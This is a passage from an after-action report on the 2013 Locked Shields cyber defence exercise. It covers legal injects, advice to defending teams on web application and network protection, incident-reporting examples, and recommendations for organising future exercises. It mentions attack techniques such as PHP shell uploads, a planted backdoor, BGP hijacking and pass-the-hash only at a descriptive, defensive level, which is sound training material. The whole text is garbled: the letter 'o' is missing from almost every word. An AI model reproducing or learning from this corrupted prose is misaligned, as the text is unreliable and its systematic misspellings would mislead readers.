cmments frm victims and cmments frm Blue Teams, but als pure lies, twisted wrds, unchecked facts, etc. Examples f the news stries can be fund in Annex V: Examples f News Stries. 39

40 6.3 Legal Injects Legal injects have been summarised in Sectin 7: Legal Play and the details with example answers can be fund in Annex VI: Legal Injects. 40

41 7 Legal Play 7.1 Intrductin This year, legal play was set up s that there was at least ne legal advisr n each Blue Team. The training bjectives fr them were as fllws: 1. T have the legal advisrs analyse the cmplex legal issues arising in the cntext f an armed cnflict; 2. T facilitate cmmunicatin between the legal and technical experts; 3. T educate the legal experts abut IT; 4. T an extent, t educate the technical experts abut the law. 7.2 Injects T meet the training bjectives, eight injects were prepared fr the legal advisrs fur fr each exercise day: 1. Each mrning the legal advisrs were asked t brief their Blue Teams abut the applicable law, their legal status, rights and bligatins. The gal was twfld t give the technical experts n the Blue Teams sme idea f the bdy f relevant law and hw it applies t their peratins, and at the same time, t require the legal advisrs t prepare the briefings under time pressure while being frced t avid legalese and make it understandable t a nn-legal audience, as is the case in real peratins; 2. T answer questins cming frm the chain f cmmand, which required a deeper legal analysis; 3. T cmmunicate with the media as well as react t stries published by the media, with the gal f addressing cmplex legal issues, refuting false statements and interpretatins, and at the same time making their psitins and explanatins understandable t the laypersn; 4. In the frm f a quiz, t answer questins abut infrmatin technlgy t facilitate a better understanding f it by the legal advisrs. 7.3 Team Setup On the rganisers part, there were three lawyers n the White Team. They were respnsible fr planning and executing the legal injects as well as scring the players respnses. In hindsight, three lawyers n the White Team was an ptimal number; hwever, scring the respnses frm ten Blue Teams kept us wrking under rather heavy time pressure and therefre next year having fur lawyers n the White Team shuld be cnsidered. T be able t fairly and thrughly assess the respnses frm Blue Teams, the lawyers n the White Team need t have a deep understanding f the legal areas invlved, and therefre it will remain a gd idea t bring in at least ne external expert in 2014 and plan fr the budget accrdingly. 41

42 7.4 Feedback n Executin The reactins t the legal play frm the Blue Teams were psitive. The exercise kept the legal advisrs busy thrughut the tw days, with naturally thse prviding mre thrugh answers having been under heavier time pressure, but in mst cases als earning mre pints. The mst cmmn feedback was that legal advisrs wuld have appreciated getting substantive feedback n their answers, and nt nly expressed in the scres that were given. As sample answers can be develped prir t the exercise and shared with the Blue Teams immediately after, this can and shuld be facilitated in Lcked Shields This wuld enable als being mre transparent with regard t the pints awarded. Hwever, t share sme insight t this year s scring, annexed t this reprt are the highest scred respnses t each inject (excluding the technical quizzes). 7.5 Results The fact that the scres allcated fr the actins f legal advisrs cunted twards the verall scres f the Blue Teams seems t have mtivated the technical experts n the Blue Teams t cperate with and assist the legal advisrs. While the legal play in 2013 was a pilt activity, and therefre the pints that culd be earned fr it were mdest, fr the exercise in 2014 allcatin f a larger prtin f the verall pssible scre fr a Blue Team shuld be cnsidered. As fr Lcked Shields 2013, the final scres f Best Blue Teams in legal aspects were the fllwing: 1. Blue Team pints 2. Blue Team pints 3. Blue Team pints As the majrity f injects were centred n the law f armed cnflict, thse legal advisrs with expertise and experience in this area naturally received the best scres. Hwever, thse legal advisrs wh were nt law f armed cnflict experts shuld be cmplimented fr their effrts in a fairly unknwn field f law. As can be seen in the annexed respnses, smetimes they were able t pint t interesting aspects that the law f armed cnflict experts were nt (see, fr example, Blue Team 10 s respnse t Inject 2, Day 2). As fr Lcked Shields 2014, ideally the participating legal advisrs will have similar backgrunds, especially if the scre percentage is raised; but if, like last year, this is nt feasible, it is mre imprtant that each Blue Team shuld have at least ne legal advisr n it. Descriptins f injects and a selectin f answers can be fund in Annex VI: Legal Injects. 42

43 8 Recmmendatins t the Blue Teams In this sectin we have prvided a few remarks t the Blue Teams n hw we think they culd imprve. 8.1 Prtecting Web Applicatins 1. Overall, the best defence is f curse t fix cnfiguratin mistakes and vulnerable cde. Gd mnitring and quick reactin als did the trick in the cntext f the exercise fr mst f the teams. Naturally, this wrks nly if the alerts are well autmated t reduce manual verhead. 2. Simple blcking, wrng r insufficient cnfiguratin changes and breaking applicatins functinality by replacing dynamic cntent with static pages is nt the way t g. In many teams, thugh, it was bvius that sme defences and blcks that were put in place were nt that effective against the attackers, but wuld have infuriated legitimate users. These methds may help t gain mre pints as ur autmatic scring system des nt have prper functinality checks. Hwever, we believe that nly limited training benefit will be gained by practising such techniques. 3. The main web applicatin vulnerabilities that remained withut the required attentin were: a. Write permissins fr the public directries enabled. b. File uplads int publicly accessible directries allwed therefre attackers can uplad and execute their wn cde. c. SQL injectin vulnerabilities nt fixed. d. Directry listing enabled. e. Template files, surce cde, database scripts, etc left in the public directry. f. Crss-Site Request and Crss-Site Request Frgery vulnerabilities nt fixed. 4. Ntes n Web Applicatin Firewalls (WAFs): As a rule, WAFs did nt really present a majr bstacle either in LS12 r in LS13. Generally, WAFs are nt very effective tls against flexible appraches by an attacker. WAFs wuld ften be effective against attacks targeting web applicatin users such as XSS. These attacks were nt perfrmed by the Red Team as legitimate web users was nt simulated in this exercise. Sme simple WEB attacks repeatedly wrked well n matter whether the WAF was implemented r nt: File uplad (PHP shell) int publicly accessible flders. Sme defences, such as denying directry listings t uplad flders did nt matter as lng as access t the upladed files was nt denied. Gd defence wuld have been prper cnfiguratin changes and ensuring that nly prper file types were permitted t be upladed. The pre-planted backdr (e.g. in the bdy cunt server) used nly AJAX and POST requests withut any parameters in the URL. If WAF detectin was relying n URL parameters, it wuld fail t detect any malicius traffic. It is imprtant t lg and analyse the bdy f POST requests. Frm the after actin feedback we learned that, fr example, BT8 essentially lked int all WEB traffic and als POST parameters. Such clse mnitring is nt always a viable apprach, but BT8 planned and built up very effective and thrugh mnitring appraches. 43

44 8.2 Prtecting ther Parts f the Infrastructure 1. T hijack the Blue Teams netwrk traffic, Red Team started t advertise BGP rutes f sme f the Blue Team netwrks in /26 prefixes. Quick and shrt-term mitigatin f that attack wuld be t annunce mre precise rutes yurself. Fr instance, tw /27 prefixes. 2. Pass-the-Hash wrked in several Blue Team netwrks. Micrsft has published a thrugh paper n the subject: Mitigating Pass-the-Hash Attacks and Other Credential Theft Techniques 3. Central mnitring f file changes and central lgging prved t be essential. 8.3 Reprting and Infrmatin Sharing Intrductin Infrmatin sharing between the Blue Teams was nt as efficient as expected. Prbably, this was mainly caused by the fact that there was cmpetitin between the Blue Teams. On ne hand, they were mtivated t share infrmatin (smetimes t much) as this prvided them with a way t gain pints. On the ther, the teams may have filtered ut sme data r delayed sharing findings in rder t gain advantage ver their ppnents Yellw Team Feedback fr the Blue Teams Belw, we explain hw yur effrts can make infrmatin sharing and situatin awareness better and wrkflws mre effective. This feedback is meant especially fr the teams that didn't d s well n the incident reprting side Shared Understanding f Infrmatin Sharing Gals First rule: think abut why yu are reprting. Once we have a shared understanding f 'why', we will wrk better tgether. The gal f the infrmatin sharing is t prvide infrmatin that: a. thers can use t prtect themselves; and b. prvides situatinal awareness t HQ s that they can make hard decisins if necessary. Fr instance, t discntinue an peratin because the related IT-system cannt be trusted anymre, r t send help, etc. When reprting, please keep in mind that the receiving end has t understand what yu are saying. A small mdificatin t yur wrding can make a big difference (see examples belw). Smetimes it lked as thugh yu just wanted t give ut the message that yu were ding smething. Admittedly that is smething wrth knwing, but the Yellw Team had that infrmatin already frm stress reprting, s incident reprts shuld have had mre cntent. Furthermre, sme teams seemed t reprt whatever their IDS system was reprting. That is a jb fr autmatin. With incident reprts, we are lking fr human insight Examples Belw, we give sme examples f useful and useless infrmatin. Useless infrmatin culd be turned int useful infrmatin by prviding additinal details. 44

45 Useful infrmatin: #bt4_js_backdraccess_004 zne=aid_dmz We have detected php backdr access n the cunting.aid4.ex web server. Surce IP Access was unsuccessful drpped by WAF. status=clse Aditinal data: URL:/bdycunt/lib/images/media.php.png This shrt message is useful in many ways: We knw that there is a backdr in a certain server, in a certain zne f BT4 s netwrk. We knw that n immediate and ptentially drastic actins are required, as the defending team is n tp f it. We knw the surce f the attack we can share this infrmatin with ther defenders s that a) they can mnitr activity frm that address and b) we are able t identify that, if there are ther cmprmises frm the same address, ptentially the same grup is behind the attack. Nt s useful infrmatin: #infra500 Misc. Wrkstatin detected zne=mil tag=int status=pen #infra500 wrkstatin with adres nt tracable anymre status=clse This directs HQ staff t speculate and spend time cntacting yu fr further infrmatin. We wuld nt like t jump t the cnclusin that this reprt was irrelevant because yu reprted it, and thus it shuld be imprtant. Belw, we run an example speculatin chain t give yu sme idea f the result f a reprt which des nt have the sufficient infrmatin. Why shuld this have been reprted? First guess is simple: there shuld nt be (undcumented?) wrkstatins appearing and disappearing in this zne. But that is just a guess. Did the wrkstatin perhaps d smething suspicius (r yu dn't knw)? Wrkstatin disappearing des nt mean that the prblem is slved. S we wnder, why did yu clse the status? Even a cmment: we dn't have time t investigate further wuld give sme clsure t the reprt. Why it was clsed withut further investigatin? Perhaps yu did investigate the case and deduced that it was just an emplyee laptp cnnected t the wrng netwrk? The bttm line is that we dn't knw and we need t spend time speculating r asking further questins. Spending an additinal 30 secnds n the reprting phase culd save 5-20 minutes f time fr the HQ staff Cnclusins Defensive teams shuld keep t the basic principles f mre effective infrmatin sharing which tend nt t be fllwed in high stress situatins: a. Lng messages with a lt f details shuld be nt shared n a chat channel. Rather, the detailed infrmatin shuld be stred n a web-prtal such as a wiki, and a link shuld be shared ver the chat. b. Every team shuld appint an infrmatin management fficer wh tracks the dynamic messages n chat and cntributes t giving that data a mre structured and usable frmat. 45

46 c. The chat channel must be kept clean f messages that are useless t ther teams. Abstract ntes such as clse the firewall r we fund vulnerabilities frm site X, fix the cde d nt help anyne. 8.4 Media Respnse The fact that all Blue Teams respnded t media requests was a significant imprvement n previus years. Mre pints culd have been received fr cntacting the jurnalist and reacting t false infrmatin, claims and speculatin published in the prtal. Als, there was relatively little initiative (press annuncements, interview ffers, stry prpsals) shwn by BTs in terms f public relatins. BT8 received the highest scre frm the media team because f their furius attempts t address false infrmatin in the prtal and their practive attitude twards the media. 46

47 9 Observatins and Recmmendatins t Imprve Lcked Shields 9.1 Exercise Organisatin 1. It shuld be determined whether it is pssible t extend the actual gameplay frm tw t three r fur days. There are many advantages: Firstly, when the ffensive campaign is spread ver mre days then a greater variety f attack and defence scenaris can be played ut. Secndly, the training audience wuld have mre time t implement the techniques that they learn during the exercise, such as reprting. Fr LS13 there was a steep learning curve during the first 2 days and the Blue Teams never had time t actually use what they learned. There are als disadvantages: The cst f the exercise wuld increase. LS13 is dependent n supprt frm many partners and vlunteers. Fr them it may be difficult t find additinal time. As an alternative, the need t spend all f Day 0 n preparatins shuld be examined. The infrastructure is mre stable and cnnectivity issues culd be slved during the preparatin days. 2. Tw days f initial access t the envirnment befre Executin and 30 minutes f RT ceasefire at the beginning f the game is enugh t allw the BTs t raise security t an acceptable level. Preparatin time shuld be decreased rather than increased. Netwrk segments that are previusly unknwn fr bth Blue and Red Teams shuld be als intrduced. BTs typically requested mre preparatin time. Nine ut f ten teams replied that either the current allcatin was OK r that mre time was needed. One team prpsed there shuld be less time as fr them the level f challenge was lwer. Fr the BTs wh tried t engage tp-level experts frm their cuntry, it was difficult t get the peple away frm their psts fr several days. Frm RT s perspective, BTs had t much time fr preparatin and minutes when they were nt allwed t cnduct any attacks was cnsidered t lng. Well prepared BTs had mapped their whle envirnment, created scripts fr autmated patching and culd easily fix mst critical vulnerabilities during the first half an hur. In additin, BTs will just blck the access until they have applied mst imprtant safeguards. WT saw that 5 BTs started t cheat, which is als an indicatin that there was t much preparatin time. 3. The number and length f planning meetings was sufficient. Hwever, separate wrkshps shuld be planned t train and prepare RT members. 4. A prper exercise clsing and awards ceremny shuld be planned. 47

48 Fr LS13 this was basically nn-existent. It felt like pulling the plug, with n clsure. Lng speeches are nt required, but it wuld have been nice t at least shw BTs the trphy that the winner will get. 5. The idea f engaging a prfessinal jurnalist with the Media Simulatin Cell seems gd and anther attempt shuld be made t make this happen. The planned real-life media embed did nt happen. While this cntributed t a mre relaxed atmsphere, it prbably had sme drawbacks n the PR side. 6. The deadlines fr finalising the infrastructure must be tighter t ensure that RT is prperly prepared. The BT reference infrastructure shuld be ver 90% ready at least a mnth befre, s that RT can train several times n the actual finalised game system. This means that Test Run may have t take place mnths befre Executin, s that GT can make final changes and apply lessns learned. In a perfect wrld, the Test Run shuld already take place n the finalised game setup. 7. The dcumentatin prvided t the Blue Teams was gd but shuld nt be further extended. It was time-cnsuming t g thrugh all the prvided dcumentatin. Hwever, it shuld be the team leader's respnsibility t read the full infrmatin package and emphasise the mst imprtant aspects t team members. 8. BTs shuld be encuraged t have their representatives attend the after actin meeting. 9.2 Scenari It was stated in the infrmatin packages that BTs are welcme t attend the after actin meeting but the imprtance f it was nt emphasised. Remte participatin in a whle day meeting is nt efficient. 1. A shrt scenari (with a BLUF versin) is enugh fr a technical exercise like LS13. Since the teams will nt cnduct detailed adversary analysis, nr develp peratinal plans beynd securing their wn systems, a mre cmprehensive scenari wuld prbably cause mre harm than gd. 2. The scenari develpment must find an acceptable balance f realism (culd smething like this happen in real life?) and feasibility (can we actually simulate the situatin, netwrks and activities required?). The LS13 scenari wrked. In general, it was realistic and cnsistent with the reality that Armed Frces f a NATO natin culd encunter. It was a little bit f a stretch in terms f there being tw separate systems that a BT had t prtect. The additinal legal detail added rle-play value, but was prbably limited t the appreciatin f the legal advisrs. 3. The apprach where each BT has t prtect a similar netwrk and where they are cmpeting with each ther has wrked well, but there are alternative prpsals: The game culd be changed frm cmpetitin between BTs t true cperatin between BTs. Fr example, BTs culd be respnsible fr hetergeneus netwrks, 48

49 nt having exactly the same tplgies. Als this way RT attack balancing apprach culd be avided. The challenge fr the BTs wuld be t keep RT scre under a certain level. 4. BTs shuld be presented with mre frensic challenges such as malware analysis. During the after actin meeting, 2 BTs expressed a feeling that they wuld have expected mre bias n incident handling and frensic analysis. Hwever, realistic malware is t sphisticated t be analysed in 2 days and the rganisers have always tried t keep the exercise as a live event. 5. A majr escalatin f the situatin shuld be cnsidered where BTs receive a high number f simultaneus attacks. 9.3 Teams Mre successful teams expected that at sme pint f time the scenari wuld vermatch them, but it didn't happen. Red Team campaign appeared t be mre like a sequence f steps t them. 1. In rder t imprve LS exercise with the same scpe, mst f the teams require mre manpwer: Red t large: difficult t crdinate and train. White t small. Cmmunicatins team t small, there shuld be dedicated blndes in additin t liaisn fficers. Scring teams t small. Media k. Yellw k. Green t small: OK during preparatins perid, but cannt supprt mre than 100 custmers during executin. Wrk distributin shuld be als better. Legal t small. 2. All critical rles shuld be identified and duplicated. Duplicated leadership f WT prved useful n Day 0, when WT leader was ill. 3. The requirements fr technical cmpetences in BTs shuld be defined in mre detail. It shuld have been emphasised mre that significant skills in web technlgies are needed. 4. A small CERT team which crdinates the effrts between BTs shuld be assembled fr the next exercise. There shuld be nt mre than 1-2 peple assigned int this rle. 9.4 White Team 49

50 1. White Team needs extra manpwer and changes t sme f the rles: The liaisn fficer and blnde rles shuld be assigned t different peple. One liaisn and ne blnde per team is suggested. Liaisn fficers reprted that they were unable t maintain cntact, awareness and wrkstatin presence at the same time even thugh we had a 10 t 10 rati this year. It is difficult fr ne blnde t cntrl mre than 3 wrkstatins (there were 12 per BT). Mre peple shuld be assigned t scre SITREPs and OPS injects. There shuld be enugh staffing t prvide feedback t the BTs in ne hur. Light-weight reprt scring team needs 6 peple per 10 BTs. 2. The activities f the blndes shuld be measurable. There was n centralised verview f hw active the blndes fr specific teams were, hw quickly they reacted t RT requests t pen sme links, r hw balanced the blnde campaign was twards different teams. Based n the feedback frm RT members, it is clear that sme BTs had t mitigate mre threats as their blnde was plainly mre active and respnsive t RT requests. 3. General cmmunicatin rule shuld be enfrced that all cmplaints, clarificatins, etc. addressed t the WT will be prcessed thrugh the Liaisn Officers, wh will then persnally ntify the apprpriate WT fficer. Deputy WT leader was unable t cnstantly mnitr the chat and white due t SITREP scring and general crdinatin wrk. This culd ptentially result in requests/issues that are handled t late r ttally missed. 9.5 Red Team 1. Fr the same scale f exercise as LS13, the cre grup f RT shuld have at least 10 peple wh must put a very serius effrt int preparatin and must be able t bring the rest f the vlunteers up t speed very quickly. BTs are taking the exercise seriusly and investing a significant amunt f time int preparatins. Infrastructure is mre stable. Thus the BTs can fcus n defending their systems, nt fighting with cre-infra prblems. They can als mre easily integrate their wn VMs with their custm tls int the envirnment. This all means that much mre effrt is required frm the RT t keep the BTs challenged. Advanced skills such as capabilities t evade detectin r kill security prducts becme essential. Custm tls and custm simulated malware are needed. 2. Separate wrkshps and trainings fr the RT members shuld be cnducted befre executin. Only a subgrup f the RT received specific trainings. Als, it was nt pssible t practice tgether n LS13 infrastructure which was nt ready early enugh. 50

51 In additin t imprving individual knwledge abut the bjectives, target systems, attack vectrs, etc. the team members need t learn each ther s skills. Even nline training wuld be beneficial. 3. The standard tls shuld be selected and lcked at least 2 mnths befre executin. Last minute changes shuld be avided, if pssible. Cbalt Strike came at shrt ntice and many RT members didn't have time t learn and custmise it (persistence, aut-migrate t smewhere else besides ntepad, beacn custmisatin withut default Win 98 user-agent header). Switch frm Backtrack5R3 t Kali happened because Backtrack5R3 Metasplit Framewrk and Armitage updating gt brken by develpers ne mnth befre LS13 executin. Switch frm Armitage t Cbalt Strike happened because f Beacn features and a last-minute permissin request frm the Authr. New experience with Kali and Cbalt Strike were appreciated. Hwever, familiarity with the tls and practice time suffered. 4. Usage f Cbalt Strike was a gd experience. Evaluating cmmercial versins f explitatin framewrks shuld be cnsidered fr their advanced features such as evasin techniques r reprting. 5. Technical slutin fr RT situatinal verview and prgress tracking needs further imprvement. N gd visual verview was available n which bjectives had been met and which had nt, etc. Mre infrmative screens abut RT attacks (started, succeeded, failed etc.) shuld be develped and shared n large displays. 6. Dedicated briefings fr RT members shuld be cnsidered s that everybdy can share their success/failure prblems. 7. The reprting prcess slws RT dwn cnsiderably and shuld be made mre light-weight. Verificatin and cmmunicatin f single task ften becmes a multi-hur prcess and may result in fllwing wrkflw: a. Is the service related t specific bjective actually up? Smetimes any initial scan r check culd result in blcks. Sme Blue Teams allwed nly 1 web request and blcked all fllwing requests, legitimate r nt. Is nly my Backtrack IP r the whle range blcked? Check with clleagues and with liaisns if necessary. b. If the service actually was up, prper functinality was nt always there. This has t then be cmmunicated thrugh the liaisns t the BTs. c. Only after previus checks are dne is it ften pssible t determine if vulnerability still exists and t cmplete the bjective. Ideas t make reprting easier: a. Prepare templates fr all bjectives and repetitins befrehand. b. Assign ne persn per RT t reprt. 51

52 8. It shuld be cnsidered whether it is pssible t make the attacks mre realistic and the RT members t behave like real attackers, fllwing all the phases that wuld be required in real situatins. One ptin is t make at least ne netwrk segment unknwn t the RT befre the game starts. a. As RT was targeting 10 identical envirnments they didn't need t run all attack phases (recnnaissance, scanning and enumeratin) against all the teams. They already had knwledge abut where imprtant cnfiguratin files were lcated, including where the file was that they had t steal. At sme level it is pssible t justify this. Exactly the same web platfrm may be used by different rganisatins and mass attacks against web applicatins are cmmn. Still, the BT didn't have any indicatins that they were a target befre the successful attack was cnducted. b. Cuntermeasures like hneypts are rendered useless if RT des nt have any mtivatin t lk fr new systems. c. The fact that RT has full knwledge f the BT systems was directly bjected t by ne BT. It was nt cnsidered realistic. This is true, but building a realistic mdel f the wrld fr the exercise is beynd the capabilities f the rganisers. RT has been prvided with insider knwledge t make the event challenging t the BTs and t put their skills under serius test, but ding s with minimal cst. BT members shuld take int accunt the fllwing: In the cntext f the exercise, RT has serius time cnstraints. RT cannt spend mnths n quiet recnnaissance. The BTs knw the exact timeframe (nly 2x8 hurs) when the ppsite frces will attack and have cncentrated their effrts n defending during that shrt perid. Exercise netwrks are very simple cmpared t their real-wrld cunterparts. There were nly 12 wrkstatins t prtect cmpared t the hundreds r even thusands ne wuld usually have. Exercise RT engagement cannt be cmpared t real ffensive peratins regarding funding. Essentially, the team members are vlunteers. They are nt highly mtivated prfessinals wh wuld spend mnths n preparatins, and wh wuld be willing t intrduce Day 0 explits, etc. Scenaris where peple with insider knwledge cperate with the adversary are nt unrealistic. The rganisers have tried t balance these aspects by prviding the RT full knwledge abut the systems and building unrealistically vulnerable netwrks. RT reprted tw suspected cases f illegal hack-back, but was unable t prve them. In the future, this culd be an additinal cnsideratin fr RTs. Nte: this year we used this t generate additinal rle-playing elements via ad-hc media and legal injects. Much better capabilities t tell the ffensive stry f LS have t be develped. BTs cannt learn if they d nt get detailed feedback abut the attacks. Typical RT reprts include hardly any technical details. Thus there is n fast way f prviding feedback. Gd ideas n what wuld be required t imprve this situatin have been prvided by Raphael Mudge, the authr f Cbalt Strike: 52

53 RT shuld be prvided with a summary f the mst imprtant rules and technical backgrund infrmatin, nt just a link t the page cvering all f the rules. The blndes were asking t click frm wrkstatins inside the BT netwrks n links pinting t a web site running n prts ther than 80 r 443. Hwever, BTs were nt required t keep utging TCP prts such as 88, 8090, 8080, 8800, 8888 pen and thse were ften blcked. 9.6 Green Team Althugh a cnsiderable amunt f dcumentatin abut the target systems was available, many RT members were nt aware f that. 1. The amunt f human resurces in GT was adequate fr the preparatin prcess. During executin, GT culd nt cpe with the lad f requests and tasks. Tw peple frm GT and ne frm YT are required t fcus nly n autscring issues. Dedicated peple shuld be available t play the Game ISP. BTs requested use f MD5 authenticatin between BGP peers, but the Game ISP was nn-cperative due t lack f time. One f the planned WAN scenaris was nt played ut (cutting the links between BTs and ISPs) due t verladed GT members. Experienced Windws administratrs shuld be part f GT t build a prper Windws dmain. 2. GT needs prper prcedures and ticketing system fr executin. The ticketing system must be accessible t all participants. Cllecting and respnding t requests was messy. There were several chats, live peple walking in, n central crdinatin, n knwledge n wh was handling the issue and what expected reslutin time was. Allcating crdinatin f this t a single persn didn't wrk. The wiki-based ticketing system was nt used at all, as nly WT/GT members culd access it and create new tickets. The fllwing fields are mst imprtant: creatr including team name/number; prblematic bject; unexpected/missing behaviur with exact details; impact - full team, many servers r single user/server; handler. 3. GT access LAN shuld have exactly the same access plicy as VPN. As the access LAN was created at the last minute, there were sme differences in accessing management netwrks. 9.7 Legal Team 1. LT shuld prepare sample answers t the injects s that it is easier t quickly prvide prper feedback 53

54 Legal advisrs wuld have appreciated getting substantive feedback n their answers, and nt nly that expressed in the scres given. 2. Fr the same scale f exercise as LS13, there shuld be fur instead f three lawyers in WT t help with scring the respnses. 9.8 Yellw Team 1. The staffing fr YT was adequate, taking int accunt that the verlad during Day 1 was expected. The reserve trp cncept shuld have better explained and emphasised t the BTs. 9.9 Cmmunicatin One YT analyst was 75% fcussed n the reprts cming in frm the 10 BTs. One was acting as a BT reserve resurce, a.k.a. reserve trp, mnitring cmmunicatin and giving ut clues. One was fcusing n stress reprting. While ne YT analyst mstly fcused n ging thrugh the reprts and instructing BTs n hw t prvide better reprts, the YT reserve persn fcused n mstly n chat and any ad hc resurces he culd pull infrmatin frm. The 'reserve trp' pinted ut several BT-t-BT cllabratin events which wuld have been missed if we had fcused nly n incident reprts. 1. Cmmunicatin with BTs during the game was much better than in previus years. Having ne liaisn fficer per BT was a gd decisin. The challenge remains t engage well-prepared peple fr this rle such that they have a gd backgrund n the exercise and can answer mre cmmn questins withut verlading ther WT and GT members with inf requests. 2. When cmmunicating with BTs, all WebEx sessins need t be run by ne persn. This persn says whse time it is t speak and what is expected. Frm an audience perspective there were t many chiefs: exercise prject lead, the WT lead, the WT deputy lead, the fictinal calitin J6, the Cmms chief. All f them were taking charge f the micrphne at sme pint, in terms f the flw f the exercise. This might have been cnfusing fr the Blues. 3. All WebEx sessins shuld be pre-annunced. It was nt clear enugh that the YT highlight sessins culd be bserved ver WebEx. 4. A camera peratr is required at least fr the ht-wash-up sessins and after actin meeting. Key peple shuld have labels n their tables t make their rle easily understandable. Often, smene ther than the main presenter needed t cmment n sme aspects. It is difficult t fllw the discussin when the persn wh talks is nt in view. 5. Instead f WHITE, a CONTROL mail address shuld be used that is clearly fr game administratin, and nt fr 'in-game rles'. The same culd be applied fr chat. This shuld be clearly cmmunicated t the BTs. Sme BTs sent their inject respnses t the white mailbx, instead f t the apprpriate inject handler (HQ, legal, jurnalist). 54

55 6. The chat rm slutin and design needs further imprvement It was hard t fllw all chats which meant that sme questins r issues were delayed r ignred Bth RT and BT members cmplained that reprting and ther cmmunicatin have t be n separate channels. The primary channel was flded with messages with hash-tags n lightweight reprts (pen, clse, update) and autmatic respnses frm the Tweetbt. Anther prpsal was t have an ptin t turn n and turn ff the autmatic respnses frm the Tweetbt. 7. Ptential side-channels shuld be identified and lgged, if pssible. A lt f cmmunicatin ccurred directly between different peple: e.g. client-side team and the blndes. These channels were nt lgged, which means ptentially interesting data is missing fr the after actin analysis. One BT made a prpsal t use different accunts fr the different stakehlders in the same BT. I.e. ne fr legal (e.g.: [email protected] ), ne fr media (e.g.: [email protected] ), ne fr peratins (e.g.: [email protected] ). Then WT shuld then send the injects t the apprpriate mailbx. 8. BTs shuld be encuraged t use fixed line cnnectivity when hlding n-line meetings BT8 used WiFi fr cnnecting t the final WebEx. This caused a chppy cnnectin and they were nt easy t understand Infrmatin Sharing and Cllabratin 1. Infrmatin sharing between the BTs was nt as beneficial as it culd have been. The BT chat channel was verladed. It was difficult t fllw the flw f messages and understand hw t help each ther. WT and YT shuld make sure BTs have mtivatin fr mre effective and useful inf exchange. The cmmn pinin amng the BT members was that the ls13blue was misused. One reasn culd be that sme teams thught that verlading the channel with inf was the way t gain mre pints. 2. BTs shuld be encuraged t share the details f their VMs and tls they did use Situatinal Awareness 1. Clearer instructins shuld be prvided t the BTs n what they are expected t reprt. The majrity f light-weight reprts were really nt abut incidents but rather abut practive measures. Frm YT s perspective these are nt imprtant. Frm an after actin analysis perspective they are very imprtant. Als, it is a gd way t prvide the leader s verview f what the team has dne. 2. The YT briefs were useful in giving an verview f the state f play. These shuld be cntinued. 3. There are sme prpsals n hw t imprve situatinal awareness during incidents. In the current list view f incidents, ne has t pen a separate incident t see imprtant details like hstname, handler and impact. The fllwing 55

56 additinal metadata wuld be valuable: Hstname, identifying t what machine the incident is related. Impact. A number 1, 2 r 3 indicating the impact, used t priritise incidents. Handler. An abbreviatin identifying the persn wh pened the incident It shuld be pssible t set the key values in the same way as thse fr status and tag. 4. The fllwing prpsals t imprve VSRm views were cllected The VSRm view fr the ttal scres table shuld be rdered by scre, nt by team. 5. A shrt summary f useful features f the cllabratin envirnment and VSRm shuld be develped Shift+ left-click t edit cells in metatables Ordering by clumn in metatables. 6. Stress reprting was a great experiment and gave excellent infrmatin abut the status f each team. It shuld be further imprved Scring 1. BTs need mre and clearer justificatin as t why specific scring decisins were made. WT needs mre resurces t be able t prvide better feedback n scring decisins. Eight ut f 10 BTs expressed sme level f dissatisfactin with the scring system: N infrmatin was prvided n hw the availability scring wrks. Better justificatin behind the scres was expected. Suggestins n hw t avid mistakes that led t negative pints were missing (this was mainly related t attacks and it wuld be pssible t prvide feedback nly after the actin). The fcus n prviding mre details abut scring shuld make it pssible fr the BTs t learn frm it. 2. Mre infrmatin abut the scring table shuld be given t the BTs befre the exercise in rder t make it mre understandable. At least the maximums fr each categry and explicit scring criteria shuld be disclsed. The ratinale prvided by ne BT n why they need detailed scring infrmatin reflected exactly the reasn why it was nt shared - t avid a rat race and BTs fcusing nly n hw t defeat the scring system and pre-calculate a winning strategy: BT1 clearly give t BTs precise indicatin n hw pints are scred, in rder t allw them t make clever decisins when it is necessary (e.g. is it better t ask fr a revert f a machine r t lse service availability fr ne hur?) On the ther hand, if the scring is cmpletely paque it causes frustratin and may have a negative impact n learning. 3. The internals f the autmatic scring system shuld be prvided t the BTs. All available details n the reasns why the check failed (scring bt's errr lg) shuld be available t the BTs. 56

57 During Executin, GT had t deal with a vast number f questins and cmplaints regarding availability checks. BTs claimed that their service was up and functinal, but the scring system reprted that the check failed. In 99% f cases, the prblem was n BTs side: The IP address f the scring bt was blcked r sme ther security measure prevented access t the service. The passwrd f the user accunt used by the scring bt was changed withut infrming WT/GT. The scring agent inside the wrkstatins did nt wrk after the mdificatins. Smetimes a prcess was cnsidered suspicius and just killed, the applied GPOs disabled all scheduled tasks including scring. One BT redirected HTTP cnnectins t HTTPS. The standard OpenSSL library used by the scring bt failed t establish a sessin against their MS IIS server (SSL handshake prblem). Hwever, accessing the webpage with the Firefx brwser wrked fine. If BTs had the details, they culd mre easily fix their wn prblems. 4. Autmated availability scring needs t be further develped t detect brken functinality and ther unfair tactics. It was nt feasible t enfrce all the rules. Therefre, the scring system favured teams using dishnest tactics: blcking user activities, changing r remving functinality, replacing web frms with stubs, and sanitising input in a way that breaks sme functinality f the applicatins. Examples f additinal features: Check if it is pssible t make cmplete transactins: lg in, submit a frm, send an e- , dwnlad file ver FTP. Randmise the requested URLs by the scring agents - BTs started whitelisting these links. Asking fr nnexistent pages and check service availability by receiving 404s. This is a cntinuus finding, but the cmplexity f the task has delayed imprvement. In additin, the web applicatins whse functinality shuld be checked are typically finalised immediately befre the exercise leaving n time t develp custm scring checks. 5. Availability checks shuld be started during the preparatin days t make sure that all services are wrking when the game starts. 6. A simple way t reprt user satisfactin r dissatisfactin with the systems shuld be develped. Blndes shuld have an easy way t prvide feedback t BTs that wrkstatins are slw (e.g. because BTs are running 2 AVs n it) r that sme functinality f the system des nt wrk. It culd be implemented as an interactive map where it is pssible t tag every system with a happy, neutral r angry face. Alternatively, there culd be just a list f systems with buttns and ptin t write a shrt cmment why specific reprt was sent. 57

